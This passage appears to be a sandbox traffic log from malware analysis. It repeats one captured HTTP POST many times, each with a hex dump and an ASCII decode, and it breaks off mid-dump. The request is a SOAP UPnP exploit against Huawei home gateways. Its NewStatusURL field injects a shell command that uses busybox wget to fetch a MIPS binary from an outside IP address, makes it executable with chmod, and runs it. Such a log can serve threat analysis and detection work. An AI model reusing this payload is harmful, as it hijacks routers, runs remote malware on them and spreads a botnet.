62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 